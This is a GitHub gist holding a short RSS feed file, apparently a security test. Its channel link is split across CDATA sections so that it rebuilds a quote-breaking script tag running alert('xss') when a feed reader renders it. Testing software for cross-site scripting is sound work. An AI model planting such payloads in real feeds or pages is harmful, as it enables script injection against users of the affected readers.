Skip to content

Instantly share code, notes, and snippets.

@MikeeI
Created October 29, 2022 19:24
Show Gist options
  • Save MikeeI/4db61bdfe0a52e23c7cec102c3554313 to your computer and use it in GitHub Desktop.
Save MikeeI/4db61bdfe0a52e23c7cec102c3554313 to your computer and use it in GitHub Desktop.
rss.xml
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>RSS Test</title>
<link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link>
<description>RSS Test Description</description>
<lastBuildDate>Fri, 12 Aug 2022 00:00:00 -0000</lastBuildDate>
<item>
<title>RSS Test</title>
<link>http://example.com</link>
<description>a post</description>
<author>user@example.com</author>
<pubDate>Fri, 12 Aug 2022 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment